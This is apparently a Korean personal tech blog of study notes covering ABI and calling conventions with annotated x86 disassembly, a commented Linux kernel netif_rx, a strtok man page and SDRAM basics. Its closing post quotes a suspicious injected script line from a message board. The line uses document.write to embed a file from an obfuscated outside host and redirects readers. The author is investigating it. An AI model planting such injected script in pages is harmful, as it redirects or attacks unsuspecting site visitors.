Passion

      ABI(Application Binary Interface)

ABI는 응용 프로그램과 운영체제, 또는 응용 프로그램과 라이브러리 사이에 필요한 저 수준 인터페이스를 정의한다. API(Application Programing Interface)와 비슷하지만 ABI는 바이너리 호환성을 가능하게 하고 API는 소스코드 호환성을 제공한다. 예를 들어 POSIX 표준은 API는 일반 산술함수가 여러 다른 시스템에서 작동하게 쓰여질 수 있는 것을 허락한다고 정의한다. 그러나 API의 사용은 각각의 플랫폼에서 재편집(리컴파일)을 요구한다. 반면에 호환성 있는 ABI는 컴파일된 오브젝트 코드가 어떤 수정 없이도 작동하는 것을 가능하게 한다. ABI는 함수의 인자들과 리턴값이 어떻게 넘겨지고 반환되는지를 다루는 호출 규약(Calling Convention)을 자세하게 다룬다.

< C source >

#include <stdio.h>

int add(int a, int b, int c, int d, int e, int f);

int main(void)

{

   int result = add(1, 2, 3, 4, 5, 6);

   printf("\n%d\n",result);

   return 0;

}

int add(int a, int b, int c, int d, int e, int f)

{

        int x;

        x = a + b + c+ d + e + f;

        return x;

}

< ASM source >

0x080483b4 <main+0>:    push   %ebp              프롤로그 : 이전 FP를 스택에 푸쉬

0x080483b5 <main+1>:    mov    %esp,%ebp       현재 esp를 FP로

0x080483b7 <main+3>:    sub    $0x28,%esp       지역변수를 위한 공간확보

0x080483ba <main+6>:    and    $0xfffffff0,%esp   스택을 16bit boundry에 맞춘다

0x080483bd <main+9>:    mov    $0x0,%eax

0x080483c2 <main+14>:   add    $0xf,%eax

0x080483c5 <main+ni17>:   add    $0xf,%eax

0x080483c8 <main+20>:   shr    $0x4,%eax

0x080483cb <main+23>:   shl    $0x4,%eax

0x080483ce <main+26>:   sub    %eax,%esp

0x080483d0 <main+28>:   movl   $0x6,0x14(%esp)          우측부터 파라미터를 스택에 저장

0x080483d8 <main+36>:   movl   $0x5,0x10(%esp)         

0x080483e0 <main+44>:   movl   $0x4,0xc(%esp)

0x080483e8 <main+52>:   movl   $0x3,0x8(%esp)

0x080483f0 <main+60>:   movl   $0x2,0x4(%esp)

0x080483f8 <main+68>:   movl   $0x1,(%esp)

0x080483ff <main+75>:    call   0x8048421 <add>          add 함수 호출

                                                                     (호출 전 stack에 ret addr 집어넣는다)

0x08048404 <main+80>:   mov    %eax,0xfffffffc(%ebp)  리턴값을 ebp-4 (지역변수)에 저장

0x08048407 <main+83>:   mov    0xfffffffc(%ebp),%eax

0x0804840a <main+86>:   mov    %eax,0x4(%esp)      

0x0804840e <main+90>:   movl   $0x8048508,(%esp)

0x08048415 <main+97>:   call   0x80482d8 <printf@plt>

0x0804841a <main+102>:  mov    $0x0,%eax

0x0804841f <main+107>:  leave   에필로그(스택정리)        Leave :  mov ebp, esp

pop ebp

                                                    esp값을 현재의 ebp 가 있는 
        곳으로 이동시킨 후, stp를 pop해서 
        ebp에 저장한다

0x08048420 <main+108>:  ret

Function add:

0x0804844c <add+0>:     push   %ebp                          프롤로그

0x0804844d <add+1>:     mov    %esp,%ebp

0x0804844f <add+3>:     sub    $0x4,%esp                    지역변수를 위한 공간할당

0x08048452 <add+6>:     mov    0xc(%ebp),%eax            

0x08048455 <add+9>:     add    0x8(%ebp),%eax            파라미터들을 더함

0x08048458 <add+12>:    add    0x10(%ebp),%eax

0x0804845b <add+15>:    add    0x14(%ebp),%eax

0x0804845e <add+18>:    add    0x18(%ebp),%eax

0x08048461 <add+21>:    add    0x1c(%ebp),%eax

0x08048464 <add+24>:    mov    %eax,0xfffffffc(%ebp)    더한값을 지역변수에 저장

0x08048467 <add+27>:    mov    0xfffffffc(%ebp),%eax

0x0804846a <add+30>:    leave

0x0804846b <add+31>:    ret

 
이걸 테스트한 환경이 기억나질 않네.. 헐..

*Netif_rx*

네트워크로부터 디바이스가 패킷을 수신했을 경우 커널에게 이를 알려주어야 한다. 패킷을 수신 하면 인터럽트가 발생하며 이 처리는 디바이스 드라이버가 맡는다. 드라이버는 지정된 커널 영역 메모리에 패킷을 복사한 후 커널로 처리과정을 넘기게 된다.

int netif_rx(struct sk_buff *skb)

{

        struct softnet_data *queue; //수신되는 패킷들을 저장해두는 큐로 사용, cpu에 하나씩

        unsigned long flags;

        /* if netpoll wants it, pretend we never saw it */

        if (netpoll_rx(skb))  // ??

                return NET_RX_DROP;

        if (!skb->tstamp.off_sec)

                net_timestamp(skb);

local_irq_save(flags);

/*인터럽트가 발생하지 않도록 파라미터로 들어가는 flags변수에 현재 인터럽트 관련 플래그가 저장된 IF 레지스터 정보를 저장한다,*/

        queue = &__get_cpu_var(softnet_data);

           // 받은 패킷들을 저장할 각각의 CPU에 큐를 배정

/ /cpu별 변수(per-CPU variable) get_cpu_var : 커널선점기능을 금지하며 cpu당 배열에서          //지역 cpu의 요소를 선택한다

   __get_cpu_var(netdev_rx_stat).total++;  //현 cpu에 수신된 총 패킷수 증가

        if (queue->input_pkt_queue.qlen <= netdev_max_backlog) {

                if (queue->input_pkt_queue.qlen) {

           //큐에 있는 패킷의 길이가 네트워크 패킷의 전체갯수보다 작거나 같고

        //큐에 패킷이 있다면

enqueue:    

                        dev_hold(skb->dev);

                        __skb_queue_tail(&queue->input_pkt_queue, skb);

//queue의 끝에 패킷을 집어 넣는다

                        local_irq_restore(flags);

// local_irq_save 전의 인터럽트 관련 세팅 상태로 원상복귀

                        return NET_RX_SUCCESS; //cpu 상태 반환 : no congestion

                }

                netif_rx_schedule(&queue->backlog_dev);

                goto enqueue;

        }

        __get_cpu_var(netdev_rx_stat).dropped++; //드랍된 패킷카운트 증가

        local_irq_restore(flags);

        kfree_skb(skb);  //리소스해제

        return NET_RX_DROP;

}

static inline void netif_rx_schedule(struct net_device *dev)

{

        if (netif_rx_schedule_prep(dev))

                __netif_rx_schedule(dev);

}

static inline void __netif_rx_schedule(struct net_device *dev)

{

        unsigned long flags;

        local_irq_save(flags);

        dev_hold(dev);

        list_add_tail(&dev->poll_list, &__get_cpu_var(softnet_data).poll_list);

        if (dev->quota < 0)

                dev->quota += dev->weight;

        else

                dev->quota = dev->weight;

        __raise_softirq_irqoff(NET_RX_SOFTIRQ); //네트워크카드에서 패킷을 수신

/*cpu의 softirq를 NET_RX_SOFTIRQ만큼 raise(pending)시킨 후 cpu의 local irq와 bottom

half의 카운트가 모두 0일 경우 softirq daemon을 활성화 시킨다 */

        local_irq_restore(flags);

}

strtok와 strtok_r 함수 관련

이름

strtok, strtok_r - 문자열에서 토큰들을 뽑아낸다.  

사용법

#include <string.h>

char *strtok(char *s, const char *delim);

char *strtok_r(char *s, const char *delim, char **ptrptr);

설명

`토큰`이란 문자열 delim에 속하지 않는 문자들로 이루어진 비어 있지 않은 문자열이며 \0이나 delim에 있는 문자가 뒤따른다.

strtok() 함수는 문자열 s를 토큰으로 파싱하기 위해 사용된다. strtok()의 첫번째 인자로 s를 주면, 가장 앞에 있는 토큰을 구하고, 그 문자열안의 다음 토큰을 구하고자 할 때에는 첫번째 인자를 NULL로 설정하여야 한다. 각 호출은 다음 토큰에 대한 포인터를 반환하거나 더이상 토큰이 발견되지 않는다면 NULL을 반환한다.

토큰이 구분자로 끝난다면, 이 구분자는 \0로 겹쳐 쓰여지며 다음 문자에 대한 포인터가 strtok()에 대한 다음 호출을 위해 저장된다. 구분 문자열 delim는 각 호출시 다를수 있다.

strtok_r() 함수는 strtok() 와 동일하게 작동한다. 그러나 정적 버퍼를 사용하는 대신에 이 함수는 char * 포인터로 할당된 유저에 대한 포인터를 사용한다. 이 포인터, ptrptr 파라미터는 같은 문자열을 파싱하는 동안 같아야만 한다.  

버그

이 함수를 사용해서는 안된다. 만일 사용해야 한다면, 다음을 주의하라:

이 함수는 처음 인자를 수정한다.

구분자의 원본은 잃게 된다.

이 함수는 상수 문자열에서는 사용해서는 안된다.

strtok () 함수는 파싱하는 동안 정적 버퍼를 사용한다. 그래서 thread safe가 아니다. 만일 이것이 문제라면 strtok_r () 를 사용해라.

반환값

strtok() 함수는 다음 토큰에 대한 포인터를 반환하거나 만일 더 이상 토큰이 없다면 NULL을 반환한다.

“DRAM은 PC나 워크스테이션에 사용되는 가장 일반적인 종류의 램이다. 메모리는 컴퓨터가 데이터를 빠르게 액세스할 수 있게 0과 1의 형태로 저장할 수 있도록 전기적으로 충전된 점들의 네트웍이다. 랜덤 액세스라는 말은 프로세서가 어떤 시작 위치로부터 차례로 진행해야 하는 것이 아니라, 메모리 또는 데이터 저장공간의 어떤 부분이라도 직접 액세스 할 수 있다는 의미를 갖는다. DRAM은 SRAM과는 달리 주기적으로 수 밀리초 마다 한번씩 새로운 전하를 가함으로써 메모리 셀을 재생시켜 주어야한다. SRAM은 메모리 셀이 전하를 제자리에 붙잡고 있는 대신에 전류가 둘 중 하나의 방향으로 전환되며 움직이는 원리로 동작하기 때문에 재생회로가 필요치 않다. SRAM은 일반적으로 DRAM보다 더 빨리 액세스할 수 있는 캐시 메모리에 사용된다.”

CAS(column address strobe), DRAM 칩에 액세스 하는데 사용되는 중요 시그널 중 하나이다. CAS는 관련된 열 주소를 알려주기 위해 DRAM에 보내지는 신호이다. DRAM의 데이터 비트는 행 주소와 열 주소의 교점에 위치하는 하나의 셀 안에 저장된다. 행 주소를 확인하기 위해서는 RAS 신호가 사용된다.

SDRAM

Syncronous DRAM으로 외부 Clock에 동기되어 동작하므로 SDRAM 이라고 하며 Clock의 Rising Edge에 동기되어 동작한다 SDRAM의 어드레싱 기본원리는 column address, row address, bank address가 바로 (x,y,z)가 되어 직육면체의 어느 한 곳(=한바이트)를 지정하게 된다

SDRAM의 액세스 동작의 순서는 nCS와 RAS(Row Address Strobe)신호를 활성화 시켜서 Row Address를 주소버스에 실어준다. 그 다음 RAS를 비활성화 시키고 CAS(Column Address
Strobe)신호를 활성화 시키고, 읽기나 쓰기 동작에 따라서 nWE신호를 주면 되는 것이다.

결국 원하는 특정주소를 지정하고 나면, 거기서부터 Column Address를 하나씩 증가시켜 가며 데이터를 버스트하게 액세스하는 것이다. 모든 동작은 CLK이라는 클럭에 positive edge에 동기되어 동작한다. 여기서 CAS latency 라는 용어가 대두되는데, read 커맨드와 첫번째 유효한 데이타 사이의 딜레이이다. 단위는 clock cycle이고, 보통 2,3 의 값을 갖는다. 즉, 2,3번 클럭 사이클 이후에 실제 데이터가 데이타버스에 실린다는 뜻이다.

SDRAM의 read, write 액세스 동작은 버스트(burst) 지향적이다. 이 말은 특정 어드레스의
데이타를 액세스할때, 한 바이트만을 하는게 아니라 한번에 여러 바이트를 액세스한다는 의미이다.  burst length는 칩마다 다른데 보통 1,2,4,8, full page 정도이다.

[참고자료]
http://www.parkoz.com/zboard/view.php?id=overclock_tech&no=314

http://newscomm.empas.com/board/bbs/read.html?a=180886&b=star&p=0

엠파스 게시판에서 이따금씩 처자사진들을 클릭해서 보는데 종종 성인 게시판이 링크가 되있길래
위의 링크에서 소스를 봤더니

document.write("<EMBED src=http://my.%44%72%45%41%4dw%49z.com/mkmkloklop/bbbb.wmv width=6 height=6>"); 

의심가는 내용은 저 한줄입니다.. paros로 봤더니 잠시뒤에 특정 페이지로 요청을 보낸 후 성인 게시판으로 이동이 되네요. response 메세지를 보고 싶었는데 웹프락시나 패킷 캡쳐를 해봐도 좀처럼 나오질 않네요. wmv 파일로 어떻게 xss를 하는지 궁금하군요